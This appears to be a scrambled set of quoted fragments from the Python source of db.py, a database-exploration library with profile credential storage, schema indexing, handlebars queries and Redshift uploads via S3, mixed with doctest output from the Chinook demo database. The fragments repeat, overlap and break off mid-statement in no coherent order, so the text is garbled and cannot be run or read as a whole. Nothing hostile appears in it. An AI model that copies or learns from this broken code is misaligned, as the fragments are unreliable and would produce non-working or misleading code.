sql) in self.cur:", ".utils import profile_path, load_profile, load_from_json, dump_to_json from .query_templates import query_templates # attempt to", "isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres,", "\\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719 11170334 1 1 None 342562 5510424", "Track t ... on a.AlbumId = t.AlbumId; ... ''' >>> len(db.query(q)) 3503 db.query(q,", "your config \"\"\" user = os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID +", "@property def tables(self): \"\"\"A lazy loaded reference to the table metadata for the", "bucket_location: boto.s3.connection.Location a specific AWS location in which to create the temporary transfer", "not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift\") self._query_templates", "We Salute You 7 For Those About To Rock We Salute You 8", "AWS_SECRET_KEY from your environment variables s3: S3 alternative to using keys, you can", "2 2 3 Restless and Wild 2 3 4 Let There Be Rock", "Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719 11170334 1 1 None", "3306 sqlite: n/a mssql: 1433 filename: str path to sqlite database dbname: str", "| | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId |", "port = 3306 elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port = 1433", "... {{#cols}} ... {{#if @last}} ... {{ . }} ... {{else}} ... {{", "have to save them in script. Parameters ---------- profile: str (optional) identifier/name for", "| NVARCHAR(120) | | MediaType | Name | NVARCHAR(120) | | Playlist |", "filename, data=None, union=True, limit=None): \"\"\" Query your database from a file. Parameters ----------", "self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables =", "a dataframe to redshift via s3. Parameters ---------- name: str name for your", "sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for", "= self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables =", "| NVARCHAR(70) | | Genre | GenreId | INTEGER | | Invoice |", "0.99 1 Balls to the Wall 0.99 2 Fast As a Shark 0.99", "\"\").replace(\"]\", \"\") # we'll create the table ONLY if it doens't exist sql", "Fast As a Shark 3 2 3 4 Restless and Wild 3 2", "an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission", "foreign_table varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\")", "query. This is used by the DB.query method. You can override it by", "any handlebars queries as a single data frame. limit: int Number of records", "db.query(q, data=data) table_name cnt 0 Album 347 1 Artist 275 2 Track 3503", "records to return Examples -------- >>> from db import DemoDB >>> db =", "of tuples, to match how normal loading is performed for col in table['columns']:", "self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in self.cur: # second value in relationship", "Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 >>> template", "{{#cols}} ... {{#if @last}} ... {{ . }} ... {{else}} ... {{ .", "installed\") if s3 is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if", "f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = [] for i in chunks:", "= \"DROP TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) #", "Please ensure it is installed\") creds = {} for arg in [\"username\", \"password\",", "2 nodes you will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws access", "= None elif dbtype==\"mssql\": port = 1433 elif profile is not None: pass", "For Those About To Rock We Salute You 7 For Those About To", "not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column))", "AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to redshift via s3.", "& R.A. Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME> 205662 6 1 <NAME>,", "except: from io import StringIO # Python 3.3+ import uuid import re import", "| GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing Address", "BY ... table_name ... ''' >>> data = [ ... {\"name\": \"Album\"}, ...", "profile) dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict representation of all credentials for the", "can't do this in the function definition because we're # lazily importing boto", "username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None,", "if limit: q = \"select top {limit} * from ({q}) q\".format(limit=limit, q=q) return", "importing boto only if necessary here. if bucket_location is None: bucket_location = Location.DEFAULT", "hooks up to the Chinook DB See http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT", "from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0 1 For Those About To", "self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables def _try_command(self, cmd): try: self.cur.execute(cmd)", "self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables,", "Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME> 205662 6 1 <NAME>, <NAME>, <NAME>", "filename: str A SQL script data: list, dict Optional argument for handlebars-queries. Data", "chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws access key. if this is None,", "table_db_ref_keys = defaultdict(list) for rel in self.cur: # second value in relationship tuple", ">>> with open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10", "pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables", "return q def _apply_handlebars(self, q, data, union=True): if (sys.version_info < (3, 0)): q", "it is installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if", "= sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't", "FROM ... Album; ... ''' >>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>>", "schemas: list List of schemas to include. Defaults to all. profile: str Preconfigured", "= db.find_table(\"tmp*\") # returns all tables prefixed w/ tmp >>> results = db.find_table(\"prod_*\")", "SupportRepId | INTEGER | | Customer | CustomerId | INTEGER | | Employee", "object print_sql: bool (False) option for printing sql statement that will be executed", "not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql library. Please ensure it is", "TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded", "not to say this a secure way to store sensitive data, but it", "tables: profile['metadata'] = True else: profile['metadata'] = False profiles[f[7:]] = profile return profiles", "the table metadata for the DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return", "= s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None:", "q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols):", "query by doing it one time, database-wide, if query is available elif not", "Salute You 9 For Those About To Rock We Salute You Name UnitPrice", "dump_to_json from .query_templates import query_templates # attempt to import the relevant database libraries", "df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>' % (i, i + chunk_size) k.set_metadata('parent',", "To Rock We Salute You 7 For Those About To Rock We Salute", "e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance of DB that hooks up", "containing Address that are varchars +----------+----------------+--------------+ | Table | Column Name | Type", "| ReportsTo | INTEGER | | Employee | EmployeeId | INTEGER | |", "= TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())])", "password self.hostname = hostname self.port = port self.filename = filename self.dbname = dbname", "0.99 8 6599424 0.99 9 8611245 0.99 >>> q = ''' ... SELECT", "+ name) else: f = os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f) except:", "IF NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform the", "MediaType | MediaTypeId | INTEGER | | Track | MediaTypeId | INTEGER |", "database properties to your db.py profile.\"\"\" if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID,", "| INTEGER | | Invoice | CustomerId | INTEGER | | Invoice |", "= \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None: continue for", ">>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3", "probably stop your little sister from stealing your passwords. Parameters ---------- profile: str", "second...\") rows_to_insert = [] tables = [row[0] for row in self.cur.execute(\"select name from", "Examples ---------- >>> from db import DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns)", "this in the function definition because we're # lazily importing boto only if", "| +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending w/ Id +---------------+---------------+---------+ | Table", "it is installed\") creds = {} for arg in [\"username\", \"password\", \"hostname\", \"port\",", "self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a given profile.", "schemas_str = ','.join([repr(schema) for schema in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif", "(optional) specify which data type(s) you want to return Examples ---------- >>> from", "for rel in self.cur: # second value in relationship tuple is the table", "w/ Id +---------------+---------------+---------+ | Table | Column Name | Type | +---------------+---------------+---------+ |", "self._metadata_cache = self.load_metadata(profile) else: self.username = username self.password = password self.hostname = hostname", "col_meta = [] table_meta = {} # pull out column metadata for all", "table_name not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type,", "self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas,", "environment variables s3: S3 alternative to using keys, you can use an S3", "Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials so you", "AWS_SECRET_KEY) #this way users with permission on specific buckets can use this feature", "data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data,", "maybe add warnings? try: import psycopg2 as pg HAS_PG = True except ImportError:", "* from ({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q, data, union=True): if", "table metadata table_meta[table['name']] = {k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')}", "0.99 5 6713451 0.99 6 7636561 0.99 7 6852860 0.99 8 6599424 0.99", "Examples -------- >>> from db import DemoDB >>> db = DemoDB() db.query(\"select *", "DemoDB >>> db = DemoDB() >>> q = ''' ... SELECT ... a.Title,", "include. Defaults to all. profile: str Preconfigured database credentials / profile for how", "a given profile. Profiles are stored in ~/.db.py_{profile_name} and are a base64 encoded", "AlbumId | INTEGER | | Album | ArtistId | INTEGER | | Artist", "AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY')", "u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432, u'username': None}, 'muppets': {u'dbname':", "table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load them into a TableSet self._tables =", "tuple is the table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load them", "S3 from .utils import profile_path, load_profile, load_from_json, dump_to_json from .query_templates import query_templates #", "| Type | +---------------+---------------+---------+ | Album | AlbumId | INTEGER | | Album", "[ ... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... ] >>>", "going to create them. \"\"\" sys.stderr.write(\"Indexing schema. This will take a second...\") rows_to_insert", "dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self, username=None,", "needs in order to operate). This includes things like schema definitions. Most of", "Rock We Salute You 8 For Those About To Rock We Salute You", "FROM ... {{ name }} ... GROUP BY ... table_name ... ''' >>>", "try: try: open(f) except: raise Exception(\"Profile '{0}' does not exist. Could not find", "by passing an argument to `DB()`. None indicates that there will be no", "def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta = {} # pull out", "Column Name | Type | +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) |", "f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if tables: profile['metadata'] =", "driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or '' ) conn_str =", "# we're going to chunk the file into pieces. according to amazon, this", "port = None elif dbtype==\"mssql\": port = 1433 elif profile is not None:", "INTEGER | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId", "all tables as list of tuples if told to use cached metadata if", "is performed for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema.", "| Type | +-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120) | | Genre", "return tables def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception as e: print (\"Error", "profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f) self.username = creds.get('username') self.password = creds.get('password')", "hostname self.port = port self.filename = filename self.dbname = dbname self.dbtype = dbtype", "operate). This includes things like schema definitions. Most of you probably don't need", "password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor()", "is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if", "else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk the file into", "using SQLite format. need to convert it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\",", "by doing it one time, database-wide, if query is available elif not use_cache", "a.Title, ... t.Name, ... t.UnitPrice ... FROM ... Album a ... INNER JOIN", ">>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0 For Those About To Rock", "schemas to include. Defaults to all. profile: str Preconfigured database credentials / profile", "profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f: prof", "= t.AlbumId; ... ''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q) 109", "elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port", "| INTEGER | | Track | GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") #", "driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432,", "str A SQL script data: list, dict Optional argument for handlebars-queries. Data will", "= \".db.py_s3_\" class DB(object): \"\"\" Utility for exploring and querying a database. Parameters", "(\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif", "a query. This is used by the DB.query method. You can override it", "def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a given profile. Profiles are stored", "[\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value = getattr(self, arg) if", "find MySQLdb or pymysql library. Please ensure it is installed\") creds = {}", "ArtistId, Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns all tables prefixed", "\"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, }", "= self.con.cursor() except: self.con = pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\",", "data type(s) you want to return Examples ---------- >>> from db import DemoDB", "the same order, making doctest fail. db.find_column(\"Name\") # returns all columns named \"Name\"", "crentials for a given profile. Profiles are stored in ~/.db.py_{profile_name} and are a", "263497 Bytes UnitPrice 0 11170334 0.99 1 5510424 0.99 2 3990994 0.99 3", "Driver for mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db", "True except ImportError: HAS_MYSQL = False try: import sqlite3 as sqlite HAS_SQLITE =", "the Wall 2 Restless and Wild 3 Restless and Wild 4 Restless and", "schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta =", "if self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']:", "'{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None,", "\"Name\" +-----------+-------------+---------------+ | Table | Column Name | Type | +-----------+-------------+---------------+ | Artist", "| INTEGER | | Track | AlbumId | INTEGER | | Track |", "table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in self.cur: # second value in", "keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize the foreign/ref key query", "'foreign_keys', 'ref_keys')} # col metadata: format as list of tuples, to match how", "row[1], row[2])) # find for table and column names self.cur.execute(\"drop table if exists", "* from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0 1 For Those About", "MediaTypeId | INTEGER | | Track | MediaTypeId | INTEGER | | Track", "of records to return Examples -------- >>> from db import DemoDB >>> db", "pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\",", "+---------------+---------------+---------+ | Table | Column Name | Type | +---------------+---------------+---------+ | Album |", "Salute You 1 Balls to the Wall 2 Restless and Wild 3 Restless", "2 3 Fast As a Shark 3 2 3 4 Restless and Wild", "... t.UnitPrice ... FROM ... Album a ... INNER JOIN ... Track t", "7 Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 >>>", "S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission on specific buckets can use this", "t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta", "os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY as either function argument", "dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\",", "if not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql libraries.", ">>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId Title ArtistId 0 1", "0 1 <NAME>, <NAME>, <NAME> 343719 1 1 None 342562 2 1 <NAME>,", "3 Restless and Wild 0.99 4 Princess of the Dawn 0.99 5 Put", "foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize the foreign/ref key query by", "in sorted(tables.keys())]) # optimize the foreign/ref key query by doing it one time,", "ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data, dict): query = template(data) query =", "if query is available elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db'])", "-------- No doctest, covered by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename':", "load_profile, load_from_json, dump_to_json from .query_templates import query_templates # attempt to import the relevant", "search: str glob pattern for what you're looking for Examples ---------- >>> from", "specify AWS_ACCESS_KEY as either function argument or as an environment variable `AWS_ACCESS_KEY`\") if", "reference to the table metadata for the DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables,", "ImportError: HAS_ODBC = False try: import pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL", "---------- q: str Query string to execute data: list, dict Optional argument for", "You 9 For Those About To Rock We Salute You Name UnitPrice 0", "find file {1}\".format(name, f)) os.remove(f) except Exception as e: raise Exception(\"Could not remove", "list (optional) specify which data type(s) you want to return Examples ---------- >>>", "q def _apply_handlebars(self, q, data, union=True): if (sys.version_info < (3, 0)): q =", "f: prof = load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database", "it'll pick up # all of the data*.gz files we've created sys.stderr.write(\"Copying data", "os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables =", "your database is running on (i.e. \"localhost\", \"10.20.1.248\") port: int Port the database", "or pymysql library. Please ensure it is installed\") creds = {} for arg", "7 Let's Get It Up 1 1 7 8 Inject The Venom 1", "profiles = {} user = os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"): profile", "1 <NAME>, <NAME>, <NAME> 233926 7 1 <NAME>, <NAME>, <NAME> 210834 8 1", "query = template(data) query = str(query) else: return q return query def query(self,", "The Venom 1 1 8 9 Snowballed 1 1 9 10 Evil Walks", "NVARCHAR(120) | | Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns", "getattr(table, col).type not in data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return", "when it comes time to run the \\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html", "col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables = {} # generate our Columns, and", "we're going to chunk the file into pieces. according to amazon, this is", "tables prefixed w/ tmp >>> results = db.find_table(\"prod_*\") # returns all tables prefixed", "if you're a db admin you might actually want to query the system", "u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432, u'username': None}, 'muppets':", "copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name,", "per node, so if running 2 nodes you will want chunk_size=4, 8, etc", "7 8 Inject The Venom 1 1 8 9 Snowballed 1 1 9", "profile) if f: prof = load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save", "load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f) return prof.get('tables', None)", "psycopg2 library. Please ensure it is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port,", "directly from cache # 2. use a single query for getting all key", "f = profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f) self.username = creds.get('username') self.password", "getattr(self, arg): value = getattr(self, arg) if arg==\"username\": arg = \"user\" elif arg==\"password\":", "AWS_ACCESS_KEY: str your aws access key. if this is None, the function will", "function will try and grab AWS_SECRET_KEY from your environment variables s3: S3 alternative", "db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>>", "self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. Please ensure it is", "is installed\") creds = {} for arg in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]:", "Album 347 1 Artist 275 2 Track 3503 >>> q = ''' ...", "None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port':", "= 5432 elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port = 3306 elif", "for what you're looking for data_type: str, list (optional) specify which data type(s)", "db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\",", "3306 elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port = 1433 elif profile", "'{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's schema", "in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas", "None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY =", "db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432,", "Rock We Salute You 1 1 2 Balls to the Wall 2 2", "| BillingAddress | NVARCHAR(70) | | InvoiceLine | InvoiceLineId | INTEGER | |", "+ \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing down bucket...\")", "\"w\") as f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title", "representation of the database as credentials plus tables dict representation.\"\"\" db_dict = self.credentials", "you'd like to drop the table if it already exists chunk_size: int (10000)", "to display in the foreign and reference keys. This is used to control", "| Table | Columns | +--------+--------------------------+ | Album | AlbumId, Title, ArtistId |", "INTEGER | | Track | AlbumId | INTEGER | | Track | MediaTypeId", "ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\"", "self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a given profile. Profiles are", "DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns |", ">>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials)", "db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those About To Rock We Salute You", "loaded reference to the table metadata for the DB.\"\"\" if len(self._tables) == 0:", "\"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data, dict): query = template(data) query", "sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta = {} #", "if s3 is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY", "actually want to query the system tables. limit: int, None Default number of", "data_type=\"NVARCHAR(70)\") # returns all columns containing Address that are varchars +----------+----------------+--------------+ | Table", "Provides an instance of DB that hooks up to the Chinook DB See", "else: hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor()", "password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\",", "self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename = None return { \"username\": self.username,", "if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if tables: profile['metadata']", "to return Examples ---------- >>> from db import DemoDB >>> db = DemoDB()", "0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict representation of", "dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db", "the db drop_if_exists: bool (False) whether you'd like to drop the table if", "str, list (optional) specify which data type(s) you want to return Examples ----------", "all columns named \"Name\" +-----------+-------------+---------------+ | Table | Column Name | Type |", "want to save to the db drop_if_exists: bool (False) whether you'd like to", "self.port = creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas", "of them is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\",", "least ones that fit into our framework), so we're going to create them.", "This is used by the DB.query method. You can override it by adding", "self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for 